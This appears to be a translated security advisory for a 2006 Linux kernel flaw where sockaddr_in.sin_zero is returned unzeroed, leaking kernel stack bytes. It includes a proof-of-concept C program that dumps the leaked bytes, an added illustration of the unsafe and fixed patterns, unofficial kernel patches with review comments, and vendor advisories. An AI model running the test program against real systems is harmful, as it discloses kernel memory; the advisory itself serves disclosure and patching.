Linux Kernel sockaddr_in.sin_zero Kernel Memory Disclosure Vulnerability
Published: 2006-03-23
Updated: 2006-11-14
Affected systems:
Linux kernel 2.6
Linux kernel 2.4
VMWare ESX Server 2.5.4
VMWare ESX Server 2.5.3
VMWare ESX Server 2.1.3
VMWare ESX Server 2.0.2
Description:
BUGTRAQ ID: 17203
CVE(CAN) ID: CVE-2006-1342, CVE-2006-1343
The Linux kernel is the kernel used by the open-source Linux operating system.
The Linux kernel has a flaw in the execution of certain socket functions that can disclose portions of kernel memory.
When certain socket functions are called to retrieve the address of a given socket, the Linux kernel returns a sockaddr_in structure to the userspace program without first zeroing its sin_zero array. An attacker can call getsockopt() with the SO_ORIGINAL_DST option, or call getsockname(), getpeername() or accept(), to leak 6 uninitialized bytes from the kernel stack.
Note: the flaw in getsockname(), getpeername() and accept() affects only 2.4 kernels.
<*Source: Pavel Kankovsky (peak@argo.troja.mff.cuni.cz)
Links: http://marc.theaimsgroup.com/?l=linux-netdev&m=114148078223594&w=2
http://secunia.com/advisories/22875/
http://lwn.net/Alerts/191267/?format=printable
http://lwn.net/Alerts/191268/?format=printable
*>
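As an added illustration of the defect and its fix (editor-supplied example code, not the advisory's test program and not kernel code), the routines below place the pre-fix pattern of assigning only the named fields of a sockaddr_in beside the post-fix pattern that also clears sin_zero, and parse the "data:" lines printed by the test program further down so the non-zero padding bytes can be counted; on a fixed kernel every line should count 0. The 0xAA poison, the loopback address and port 8080 are constructed stand-ins.

```c
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>

/* Pre-fix pattern: only the named fields are assigned; sin_zero keeps stale buffer bytes. */
void fill_sockaddr_unsafe(struct sockaddr_in *sin, in_addr_t addr_be, in_port_t port_be)
{
    sin->sin_family = AF_INET;
    sin->sin_port = port_be;
    sin->sin_addr.s_addr = addr_be;
}

/* Post-fix pattern: clear the padding before the struct is handed to userspace. */
void fill_sockaddr_safe(struct sockaddr_in *sin, in_addr_t addr_be, in_port_t port_be)
{
    fill_sockaddr_unsafe(sin, addr_be, port_be);
    memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
}

/* Number of non-zero bytes in sin_zero; 0 means no padding leaked. */
int sin_zero_dirty_bytes(const struct sockaddr_in *sin)
{
    int n = 0;
    for (size_t i = 0; i < sizeof(sin->sin_zero); i++) n += sin->sin_zero[i] != 0;
    return n;
}

/* Constructed stand-in for a reused stack slot: poison with 0xAA, fill, count leaked padding. */
int demo(int hardened)
{
    struct sockaddr_in sin;
    memset(&sin, 0xAA, sizeof(sin));
    (hardened ? fill_sockaddr_safe : fill_sockaddr_unsafe)(&sin, htonl(INADDR_LOOPBACK), htons(8080));
    return sin_zero_dirty_bytes(&sin);
}
/* Parse a "data: 02 00 1f 90 ..." line as printed by the test program's dump();
 * returns the dirty sin_zero byte count, or -1 if the line is malformed. */
int dump_line_dirty_bytes(const char *line)
{
    struct sockaddr_in sin;
    const char *p = strchr(line, ':');
    char *end;
    if (!p) return -1;
    p++;                                      /* skip the "data:" label */
    for (size_t n = 0; n < sizeof(sin); n++, p = end) {
        unsigned long v = strtoul(p, &end, 16);
        if (end == p || v > 0xff) return -1;  /* too few bytes or not hex */
        ((unsigned char *)&sin)[n] = (unsigned char)v;
    }
    return sin_zero_dirty_bytes(&sin);
}
```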
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/netfilter_ipv4.h>

/* Print every byte of the sockaddr_in the kernel handed back. The last
 * eight bytes are sin_zero; on an affected kernel they carry stack data. */
void
dump(const unsigned char *p, unsigned l)
{
    printf("data:");
    while (l > 0) {
        printf(" %02x", *p);
        ++p; --l;
    }
    printf("\n");
}

int
main(int argc, char **argv)
{
    int port;
    int ls, as, r, one;
    struct sockaddr_in sa;
    socklen_t sl;

    if (argc != 2 || (port = atoi(argv[1])) == 0) {
        fprintf(stderr, "usage: bug PORT\n");
        return (1);
    }
    /* Listen on PORT; one incoming connection drives the three calls below. */
    ls = socket(PF_INET, SOCK_STREAM, 0);
    if (ls == -1) {
        perror("ls = socket");
        return (1);
    }
    one = 1;
    r = setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
    if (r == -1) {
        perror("setsockopt(ls)");
        return (1);
    }
    sa.sin_family = PF_INET;
    sa.sin_addr.s_addr = INADDR_ANY;
    sa.sin_port = htons(port);
    r = bind(ls, (struct sockaddr *) &sa, sizeof(sa));
    if (r == -1) {
        perror("bind(ls)");
        return (1);
    }
    r = listen(ls, 1);
    if (r == -1) {
        perror("listen(ls)");
        return (1);
    }
    /* accept(): affected on 2.4 kernels only. */
    sl = sizeof(sa);
    as = accept(ls, (struct sockaddr *) &sa, &sl);
    if (as == -1) {
        perror("accept(ls)");
        return (1);
    }
    dump((unsigned char *) &sa, sizeof(sa));
    /* getsockname(): affected on 2.4 kernels only. */
    sl = sizeof(sa);
    r = getsockname(as, (struct sockaddr *) &sa, &sl);
    if (r == -1) {
        perror("getsockname(as)");
        return (1);
    }
    dump((unsigned char *) &sa, sizeof(sa));
    /* getsockopt(SO_ORIGINAL_DST): served by ip_conntrack, affected on 2.4 and 2.6. */
    sl = sizeof(sa);
    r = getsockopt(as, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *) &sa, &sl);
    if (r == -1) {
        perror("getsockopt(as)");
        return (1);
    }
    dump((unsigned char *) &sa, sizeof(sa));
    return (0);
}
Recommendations:
Vendor patches:
Linux
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:
http://www.kernel.org/
The following is an unofficial patch for the 2.4 series:
--- linux/net/ipv4/af_inet.c.sockname Thu Feb 16 16:03:57 2006
+++ linux/net/ipv4/af_inet.c Thu Feb 16 16:25:02 2006
@@ -724,6 +724,7 @@
sin->sin_port = sk->sport;
sin->sin_addr.s_addr = addr;
}
+ memset(sin->sin_zero, 0, sizeof(sin->sin_zero));
*uaddr_len = sizeof(*sin);
return(0);
}
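Review bot: the memset of sin->sin_zero sits after the closing brace of the if/else that fills sin_port and sin_addr and before *uaddr_len is assigned, so both branches of inet_getname() reach it before the structure is returned, which is the right spot; a more future-proof variant is memset(sin, 0, sizeof(*sin)) at the top of the function, so that any field added to the structure later cannot reintroduce the leak, and the added line should carry a one-line comment stating that the padding must not reach userspace with kernel stack contents.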
--- linux/net/ipv4/netfilter/ip_conntrack_core.c.sockname Thu Feb 16 16:03:58 2006
+++ linux/net/ipv4/netfilter/ip_conntrack_core.c Thu Feb 16 16:26:13 2006
@@ -1341,6 +1341,7 @@
.tuple.dst.u.tcp.port;
sin.sin_addr.s_addr = h->ctrack->tuplehash[IP_CT_DIR_ORIGINAL]
.tuple.dst.ip;
+ memset(sin.sin_zero, 0, sizeof(sin.sin_zero));
DEBUGP("SO_ORIGINAL_DST: %u.%u.%u.%u %u\n",
NIPQUAD(sin.sin_addr.s_addr), ntohs(sin.sin_port));
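Review bot: sin is a local structure whose padding is never initialised, and clearing sin.sin_zero right after the last field assignment and before the DEBUGP is correct for the lines shown; the hunk does not show the later copy to the caller, so confirm that nothing between this line and that copy touches sin_zero again. As in af_inet.c, a memset(&sin, 0, sizeof(sin)) at the declaration is more robust than clearing the padding field alone, and the change deserves a comment explaining why.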
RedHat
------
RedHat has released security advisories (RHSA-2006:0579-01, RHSA-2006:0580-01) and corresponding patches for this issue:
RHSA-2006:0579-01: Important: kernel security update
Link: http://lwn.net/Alerts/191267/?format=printable
RHSA-2006:0580-01: Moderate: kernel security update
Link: http://lwn.net/Alerts/191268/?format=printable
VMWare
------
The vendor has released upgrade patches that fix this security issue; download them from the vendor's homepage:
http://www.vmware.com/download/esx/esx-253-200610-patch.html
http://www.vmware.com/download/esx/esx-254-200610-patch.html
http://www.vmware.com/download/esx/esx-213-200610-patch.html
http://www.vmware.com/download/esx/esx-202-200610-patch.html
